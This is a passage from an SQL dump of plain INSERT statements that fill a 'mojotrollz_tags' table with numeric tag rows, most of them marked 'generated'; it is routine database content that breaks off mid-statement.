INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10219, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10220, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10220, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10220, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10221, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10221, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10221, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10257, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10257, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10257, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10258, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10259, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10260, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10260, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10261, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10262, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10262, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10263, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10263, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10263, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10264, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10266, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10266, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10266, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10266, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10266, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10266, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10267, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10267, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10268, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10276, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10276, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10277, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10277, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10278, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10278, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10290, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10293, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10293, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10296, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10296, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10296, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10299, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10299, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10299, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10300, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10300, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10301, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10301, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10302, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10302, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10303, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10303, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10304, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10304, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10305, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10305, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10306, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10306, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10307, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10307, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10316, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10316, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10316, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10317, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10317, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10317, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10318, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10318, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10318, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10319, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10319, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10319, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10321, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10321, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10322, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10323, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10336, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10337, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10338, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10339, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10340, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10356, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10356, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10357, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10357, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10358, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10358, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10359, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10359, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10360, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10360, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10361, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10361, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10363, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10363, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10363, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10364, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10364, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10364, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10366, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10366, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10366, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10367, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10367, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10367, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10369, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10369, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10369, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10371, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10371, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10371, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10372, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10372, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10372, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10373, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10374, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10374, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10374, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10375, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10376, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10376, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10376, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10377, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10377, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10378, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10378, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10379, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10379, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10380, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10380, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10381, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10381, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10381, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10382, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10382, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10382, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10383, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10384, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10384, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10384, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10385, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10385, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10385, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10387, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10388, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10389, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10390, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10390, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10390, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10391, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10391, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10391, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10393, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10394, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10398, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10398, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10398, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10399, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10399, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10399, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10400, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10400, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10400, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10405, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10405, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10405, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10406, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10406, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10406, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10407, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10407, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10407, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10408, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10408, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10408, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10409, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10409, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10409, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10411, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10412, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10412, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10412, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10413, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10413, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10413, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10414, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10414, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10414, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10415, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10415, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10415, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10416, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10416, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10416, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10417, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10417, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10417, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10418, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10418, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10418, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10419, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10419, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10419, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10420, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10420, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10420, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10421, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10421, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10421, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10422, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10422, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10422, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10423, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10423, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10423, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10424, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10424, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10424, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10425, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10425, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10425, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10426, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10426, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10426, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10427, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10427, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10428, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10428, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10429, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10430, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10430, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10430, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10431, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10431, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10432, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10432, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10433, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10433, 1, 30, 1, 